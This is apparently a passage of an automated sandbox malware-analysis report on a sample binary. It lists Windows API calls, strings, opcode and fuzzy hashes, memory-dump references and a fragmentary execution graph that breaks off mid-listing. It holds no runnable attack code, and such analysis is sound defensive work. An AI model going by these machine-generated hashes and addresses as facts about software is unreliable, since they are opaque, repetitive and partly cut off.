                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                      • String ID: Thread pool initialization failed.
                                                                                                                                                      • API String ID: 3340455307-2182114853
                                                                                                                                                      • Opcode ID: 1eb3c362c4a5b385b9195d8ee9c352c739c29f570639ffa371689ac3c6c58346
                                                                                                                                                      • Instruction ID: c4b029df5338cf3db2fbadf5f76633e2c93516bedce0d523cb18c92d3a224a03
                                                                                                                                                      • Opcode Fuzzy Hash: 1eb3c362c4a5b385b9195d8ee9c352c739c29f570639ffa371689ac3c6c58346
                                                                                                                                                      • Instruction Fuzzy Hash: EB1191F1644709AFC3319F6A9C849ABFBECFB54754F10082EF1DAC2200D6B069808B60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 0-56093855
                                                                                                                                                      • Opcode ID: c5e4f7ee5e42591d2fa7ed62c6ffb838f25121113812f417212993446b55784d
                                                                                                                                                      • Instruction ID: 2082fdbd6e9ff5f9957b9cb224baaf2f9712201d9e8f54d65353545c03f7b582
                                                                                                                                                      • Opcode Fuzzy Hash: c5e4f7ee5e42591d2fa7ed62c6ffb838f25121113812f417212993446b55784d
                                                                                                                                                      • Instruction Fuzzy Hash: 3B11A539705344AFD710CFA9EC44A167BE8F7CD392B048829F549C3620C3B19896EF62
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00A4A843,00000000,?,00A76150,?,?,?,00A4A9E6,00000004,InitializeCriticalSectionEx,00A5F7F4,InitializeCriticalSectionEx), ref: 00A4A89F
• GetLastError.KERNEL32(?,00A4A843,00000000,?,00A76150,?,?,?,00A4A9E6,00000004,InitializeCriticalSectionEx,00A5F7F4,InitializeCriticalSectionEx,00000000,?,00A4A79D), ref: 00A4A8A9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A4A8D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A50481,?,00000000,?,00000001,?,?,00000001,00A50481,?), ref: 00A53685
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5370E
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A4DBD1,?), ref: 00A53720
• __freea.LIBCMT ref: 00A53729
  • Part of subcall function 00A5040E: RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
• __EH_prolog3.LIBCMT ref: 00A362D4
• ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00A362EB
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00A36328
• _wcslen.LIBCMT ref: 00A36338
Similarity
• API ID: EnvironmentExpandStrings$H_prolog3_wcslen
• String ID:
• API String ID: 3741103063-0
APIs
• __EH_prolog3.LIBCMT ref: 00A31273
  • Part of subcall function 00A3067E: GetVersionExW.KERNEL32(?), ref: 00A306AF
• FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00A2350C,5C02E13E,00000000,?,?,00A243F5,?,?,?,00000000), ref: 00A3129A
• FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00A312D4
• _wcslen.LIBCMT ref: 00A312DF
Similarity
• API ID: FoldString$H_prolog3Version_wcslen
• String ID:
• API String ID: 535866816-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00A5198B,00000000,00000000,00000000,00000000,?,00A51B88,00000006,FlsSetValue), ref: 00A51A16
• GetLastError.KERNEL32(?,00A5198B,00000000,00000000,00000000,00000000,?,00A51B88,00000006,FlsSetValue,00A60DD0,FlsSetValue,00000000,00000364,?,00A500D7), ref: 00A51A22
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A5198B,00000000,00000000,00000000,00000000,?,00A51B88,00000006,FlsSetValue,00A60DD0,FlsSetValue,00000000), ref: 00A51A30
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• __EH_prolog3.LIBCMT ref: 00A31310
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00A317FB,?,?,\\?\,5C02E116,?,?,?,00000000,00A5A279,000000FF), ref: 00A31319
• GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00A5A279,000000FF), ref: 00A31348
• _wcslen.LIBCMT ref: 00A31351
Similarity
• API ID: CurrentDirectory$H_prolog3_wcslen
• String ID:
• API String ID: 19219720-0
                                                                                                                                                      • Opcode ID: aa6d41c0a26b04d67aeaa4800ae00e131e1843cae527a0d95e72ad44b4da1d8a
                                                                                                                                                      • Instruction ID: 716fca243e1436328b5e79dac29000bf7b492d099a292a54ec9528dd9a6f435d
                                                                                                                                                      • Opcode Fuzzy Hash: aa6d41c0a26b04d67aeaa4800ae00e131e1843cae527a0d95e72ad44b4da1d8a
                                                                                                                                                      • Instruction Fuzzy Hash: 7701A275D0062AFB8B40AFF89A558BFBB79BF91720F100219B511EB281CF34990186E0
APIs
• SleepConditionVariableCS.KERNELBASE(?,00A462BB,00000064), ref: 00A46341
• LeaveCriticalSection.KERNEL32(00A760E0,?,?,00A462BB,00000064,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A4634B
• WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00A462BB,00000064,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A4635C
• EnterCriticalSection.KERNEL32(00A760E0,?,00A462BB,00000064,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A46363
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
• String ID:
• API String ID: 3269011525-0
• Opcode ID: 46956f53ba106c969f54642ce5f6f4e0cdbd98d3d1ce6254ed1857699e7a4ad8
• Instruction ID: 2c359402e89c6796fe6b626e4e7b4b4ee2396c1f1fbc358571a375c7c601c2b4
• Opcode Fuzzy Hash: 46956f53ba106c969f54642ce5f6f4e0cdbd98d3d1ce6254ed1857699e7a4ad8
• Instruction Fuzzy Hash: 8DE06D31540B34FFC7116BD0BC09B9D7F28BB05BA2B04C010F50AA61A0C76169129BD5
APIs
• GetDC.USER32(00000000), ref: 00A3EB77
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00A3EB86
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A3EB94
• ReleaseDC.USER32(00000000,00000000), ref: 00A3EBA2
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 2d2d56eb7a6bdfd305fb44abb55d0e976733d7285d66f9d16377c619f95f91fa
• Instruction ID: 2d49f3372408b170fed2180b33633884f262c45e86bea17e81cea8b5ee2a868f
• Opcode Fuzzy Hash: 2d2d56eb7a6bdfd305fb44abb55d0e976733d7285d66f9d16377c619f95f91fa
• Instruction Fuzzy Hash: 35E0E631985F2057D6119BF07D1DB8A3B549B15753F408151F609991E0C6A044828BD4
APIs
• __Init_thread_footer.LIBCMT ref: 00A38294
  • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
  • Part of subcall function 00A4087E: __EH_prolog3_GS.LIBCMT ref: 00A40885
  • Part of subcall function 00A4087E: GetLastError.KERNEL32(0000001C,00A38244,?,00000000,00000086,?,5C02E116,?,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A4089D
  • Part of subcall function 00A4087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00A5A75D,000000FF), ref: 00A408D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
• String ID: %ls
• API String ID: 1279724102-3246610740
• Opcode ID: efbfddae33be045df1128f018ccdc3ad17fe9868b8aaaa0ff9b0895f32e9b0ba
• Instruction ID: afe31efff060b3231e35aa4924ee0053ade59d1deae873b86de5472f36278d85
• Opcode Fuzzy Hash: efbfddae33be045df1128f018ccdc3ad17fe9868b8aaaa0ff9b0895f32e9b0ba
• Instruction Fuzzy Hash: 23B1BEB0800209EEDB34EF94CE56FEE7BB1BF25340F204919F456271D1DBB96A54DA80
APIs
  • Part of subcall function 00A3EBAA: GetDC.USER32(00000000), ref: 00A3EBAE
  • Part of subcall function 00A3EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A3EBB9
  • Part of subcall function 00A3EBAA: ReleaseDC.USER32(00000000,00000000), ref: 00A3EBC4
• GetObjectW.GDI32(?,00000018,?), ref: 00A3EF65
  • Part of subcall function 00A3F1EC: GetDC.USER32(00000000), ref: 00A3F1F5
  • Part of subcall function 00A3F1EC: GetObjectW.GDI32(?,00000018,?), ref: 00A3F224
  • Part of subcall function 00A3F1EC: ReleaseDC.USER32(00000000,?), ref: 00A3F2BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: (
• API String ID: 1061551593-3887548279
• Opcode ID: 04d67bf5b729b3ed26e4137a9da3395ee2bf0ccc0c3853c07e50cac1c674683c
• Instruction ID: 11f64d7c4dd20cbb077d32e878e5c1e7bcaa81f0296ad7519e3dbfab58a615e9
• Opcode Fuzzy Hash: 04d67bf5b729b3ed26e4137a9da3395ee2bf0ccc0c3853c07e50cac1c674683c
• Instruction Fuzzy Hash: 12910471618314AFC650DF69DC44A6FBBE9FF89710F00491EF98AD7260CB70A905CB62
APIs
• _free.LIBCMT ref: 00A51FD4
  • Part of subcall function 00A4ACBB: IsProcessorFeaturePresent.KERNEL32(00000017,00A4AC8D,00A4535E,?,?,00000000,00A4535E,00000016,?,?,00A4AC9A,00000000,00000000,00000000,00000000,00000000), ref: 00A4ACBD
  • Part of subcall function 00A4ACBB: GetCurrentProcess.KERNEL32(C0000417,?,00A4535E), ref: 00A4ACDF
  • Part of subcall function 00A4ACBB: TerminateProcess.KERNEL32(00000000,?,00A4535E), ref: 00A4ACE6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
• Instruction ID: 07662469301213ae37ba5ed50faab163fdfef43d071505e132de36bb22213df5
• Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
• Instruction Fuzzy Hash: 33518C76E0020AAFDB14CFA8C881ABDB7B5FF98315F24416AEC54A7341E7359A09CB50
APIs
  • Part of subcall function 00A379F7: GetSystemTime.KERNEL32(?,00000000), ref: 00A37A0F
  • Part of subcall function 00A379F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A37A1D
  • Part of subcall function 00A379A0: __aulldiv.LIBCMT ref: 00A379A9
• __aulldiv.LIBCMT ref: 00A2F162
• GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,5C02E116,?,?,00000000,?,00000000,00A59F3D,000000FF), ref: 00A2F169
  • Part of subcall function 00A21150: _wcslen.LIBCMT ref: 00A2115B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
• String ID: .rartemp
• API String ID: 3789791499-2558811017
• Opcode ID: 2acd86d5375999bd7ac621e81009fad12e820a1082500e1510013ef0d34e32f8
• Instruction ID: dafc3cd5638f3e6f1719d4d94c72035b49010d9a043c2b609d371a7978d9184f
• Opcode Fuzzy Hash: 2acd86d5375999bd7ac621e81009fad12e820a1082500e1510013ef0d34e32f8
• Instruction Fuzzy Hash: 62416E71900258AFDF14EFA8DD45EEE77B9FF54350F404129B915A3282EB349B49CBA0
APIs
• __EH_prolog3.LIBCMT ref: 00A3DAD5
  • Part of subcall function 00A30360: __EH_prolog3.LIBCMT ref: 00A30367
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: H_prolog3
• String ID: Shell.Explorer$about:blank
• API String ID: 431132790-874089819
• Opcode ID: 87a400f5b57b401e3257dd83094d1696a98fdae2c22a5a0aaa4555a24aadaab9
• Instruction ID: 2f30db98fcafb2ae36086dfb95591d97dfedb5176a56a7d6dbce29641752f366
• Opcode Fuzzy Hash: 87a400f5b57b401e3257dd83094d1696a98fdae2c22a5a0aaa4555a24aadaab9
• Instruction Fuzzy Hash: 2F416E74A00301DFDB08EFA4D991B6AB7B5BF88700F15846DF906AF291DB70AD00CB51
APIs
  • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
  • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
• EndDialog.USER32(?,00000001), ref: 00A4017B
• SetDlgItemTextW.USER32(?,00000067,?), ref: 00A401B9
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• API String ID: 445417207-3292211884
• Opcode ID: ef5187972e5ba3ed271c9b1d2b3487fd3980f65142f5cfbd3d34a622422fdc43
• Instruction ID: 84af0923d036ebf86d1708d292571a25d048edd4e872b4962eef443d457e500b
• Opcode Fuzzy Hash: ef5187972e5ba3ed271c9b1d2b3487fd3980f65142f5cfbd3d34a622422fdc43
• Instruction Fuzzy Hash: DF1104B6A44314BBD220DB789C49FFB77ACEBC5711F404A29F749A7180C770A842A6B5
APIs
  • Part of subcall function 00A35094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A350B3
  • Part of subcall function 00A35094: GetProcAddress.KERNEL32(00A751F8,CryptUnprotectMemory), ref: 00A350C3
• GetCurrentProcessId.KERNEL32(?,00000200,?,00A35104), ref: 00A35197
Strings
• CryptProtectMemory failed, xrefs: 00A3514E
• CryptUnprotectMemory failed, xrefs: 00A3518F
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: 77f5e098588ff9a32c2b51f3a133a28e910a0c0d6d2238962eb9ad5b6bfa47c2
• Instruction ID: 945863da3cf0f743c2e56554010805fdd1a135ae130c7a4cb628ce8f43e29854
• Opcode Fuzzy Hash: 77f5e098588ff9a32c2b51f3a133a28e910a0c0d6d2238962eb9ad5b6bfa47c2
• Instruction Fuzzy Hash: C311D331E01B24ABDB15AF78AC01AAE3B65BF40B61F008215FC196B296D770AD42C6D4
APIs
• IsWindowVisible.USER32(00010452), ref: 00A44291
• DialogBoxParamW.USER32(GETPASSWORD1,00010452,00A40110,?), ref: 00A442BA
Strings
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1
• API String ID: 3157717868-3292211884
• Opcode ID: e812e129abab8ff34f6bb48f0240f351da3ab100c68f16e8cedf1e9e7c2395a9
• Instruction ID: 25ed0d63b15912374a56d355ee5529d8d7031babeed89ca74e8e2f66c0a0e4b1
• Opcode Fuzzy Hash: e812e129abab8ff34f6bb48f0240f351da3ab100c68f16e8cedf1e9e7c2395a9
• Instruction Fuzzy Hash: DD016D34686724BFC700EBB89C16FDB37D8BB46311B00C615F809971A5CAF08881DB61
APIs
  • Part of subcall function 00A33EAA: _swprintf.LIBCMT ref: 00A33EEA
  • Part of subcall function 00A33EAA: _strlen.LIBCMT ref: 00A33F0B
  • Part of subcall function 00A33EAA: SetDlgItemTextW.USER32(?,00A6919C,?), ref: 00A33F64
  • Part of subcall function 00A33EAA: GetWindowRect.USER32(?,?), ref: 00A33F9A
  • Part of subcall function 00A33EAA: GetClientRect.USER32(?,?), ref: 00A33FA6
• GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
• SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
Strings
Similarity
• API ID: ItemRectTextWindow$Client_strlen_swprintf
• String ID: 0
• API String ID: 2622349952-4108050209
• Opcode ID: fce4de01df97ca121def485dd1462e47e712ec184eece149d73108dcf5f89f07
• Instruction ID: 14ce7382ef355349090ff2246d5185a727067b57b618e1f397382371603fa0f8
• Opcode Fuzzy Hash: fce4de01df97ca121def485dd1462e47e712ec184eece149d73108dcf5f89f07
• Instruction Fuzzy Hash: A9F0C230544398AADF154F64EE0ABFB3BAABF24304F458274FC48541A1C7B4CB95DB60
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A45379
  • Part of subcall function 00A452FB: std::exception::exception.LIBCONCRT ref: 00A45308
  • Part of subcall function 00A4734A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00A4536C,?,00A66C54,?), ref: 00A473AA
• ___delayLoadHelper2@8.DELAYIMP ref: 00A4539F
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Strings
Similarity
• API ID: ExceptionRaise$AccessDloadHelper2@8LoadReleaseSectionWrite___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
• String ID: @UJu
• API String ID: 1552410523-4208871750
• Opcode ID: 95479e83307cc46baf836824a5f2e4506c254f93b8a0b4b3f3123d0e62cb5981
• Instruction ID: e8e2b7851924ea8595be19099c9dcc8b571c068a52949f5bdc401bb97bf7b043
• Opcode Fuzzy Hash: 95479e83307cc46baf836824a5f2e4506c254f93b8a0b4b3f3123d0e62cb5981
• Instruction Fuzzy Hash: B5D05B6DD1C60CBB9704BAF0DD16CBE373CE980B00F618515F940D5482EAA0650555A1
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00A3770A,?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375F3
• GetLastError.KERNEL32(?,?,00A3777F,?,?,?,?,?,00A37769), ref: 00A375FF
  • Part of subcall function 00A292EB: __EH_prolog3_GS.LIBCMT ref: 00A292F2
Strings
• WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A37608
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                      • API String ID: 2419225763-2248577382
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,5C02E116), ref: 00A33E65
                                                                                                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00A33E73
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindHandleModuleResource
                                                                                                                                                      • String ID: RTL
                                                                                                                                                      • API String ID: 3537982541-834975271
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                      • String ID: `&C
                                                                                                                                                      • API String ID: 3253501508-2610790716

                                                                                                                                                      Execution Graph

Execution Coverage: 3.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 1.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 80
95984->95978 95984->95980 95984->95983 95987 5a3ef6 81 API calls 95984->95987 95988 54b2d6 254 API calls 95984->95988 95989 5505d2 5 API calls __Init_thread_wait 95984->95989 95990 550433 29 API calls __onexit 95984->95990 95991 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95984->95991 95992 5b5131 101 API calls 95984->95992 95993 5b721e 254 API calls 95984->95993 95987->95984 95988->95984 95989->95984 95990->95984 95991->95984 95992->95984 95993->95984 95994 583bae 96015 59c72e 95994->96015 95997 583bb8 95998 583be3 95997->95998 95999 59c72e Sleep 95997->95999 96005 53ef8b 95997->96005 96021 54a9e5 9 API calls 95997->96021 96000 53b25f 8 API calls 95998->96000 95999->95997 96001 583c13 96000->96001 96022 53bf39 39 API calls 96001->96022 96003 583c2f 96023 5a4384 8 API calls 96003->96023 96008 53f400 96005->96008 96007 53f047 96009 53f41f 96008->96009 96011 53f433 96008->96011 96024 53e910 96009->96024 96056 5a3ef6 81 API calls __wsopen_s 96011->96056 96012 53f42a 96012->96007 96014 584528 96014->96014 96016 59c754 96015->96016 96018 59c739 96015->96018 96017 59c782 96016->96017 96019 59c766 Sleep 96016->96019 96017->95997 96018->95997 96019->96017 96021->95997 96022->96003 96023->96007 96025 5402f0 254 API calls 96024->96025 96027 53e94d 96025->96027 96026 53e9bb messages 96026->96012 96027->96026 96028 53ed85 96027->96028 96030 53ea73 96027->96030 96036 53eb68 96027->96036 96041 583176 96027->96041 96045 55016b 8 API calls 96027->96045 96051 53ead9 __fread_nolock messages 96027->96051 96028->96026 96037 55019b 8 API calls 96028->96037 96030->96028 96032 53ea7e 96030->96032 96031 53ecaf 96034 53ecc4 96031->96034 96035 583167 96031->96035 96033 55016b 8 API calls 96032->96033 96044 53ea85 __fread_nolock 96033->96044 96038 55016b 8 API calls 96034->96038 96062 5b6062 8 API calls 96035->96062 96040 55019b 8 API calls 96036->96040 96037->96044 96048 53eb1a 96038->96048 96040->96051 96063 5a3ef6 81 API calls __wsopen_s 96041->96063 96042 55016b 
